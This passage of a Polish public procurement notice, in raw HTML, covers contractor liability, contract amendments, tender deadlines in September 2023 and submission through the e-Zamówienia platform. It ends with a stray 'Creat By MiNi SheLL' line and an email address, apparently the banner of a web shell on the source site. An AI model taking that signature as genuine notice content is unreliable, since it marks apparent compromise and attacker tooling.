art. 445 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należnego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy oraz warunki dokonania zmian zostały określone w paragrafie 6 załącznika do SWZ - TOM II- wzór umowy dla każdej z części<br/>2. Szczególowy zakres umowy został opisany w TOM II do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie OFERT w niniejszym postępowaniu odbywa się przy pomocy Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Akceptowane będą faktury elektroniczne, stosowane będą płatności elektroniczne, informacje dla wykonawców polegających na zasobach innych podmiotów oraz zamierzających powierzyć wykonanie części zamówienia podwykonawcom opisano w pkt. 13 SWZ, informacje dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisano w pkt. 14 SWZ, dodatkowa obligatoryjna przesłanka wykluczenia została opisana w pkt. 9.6.SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com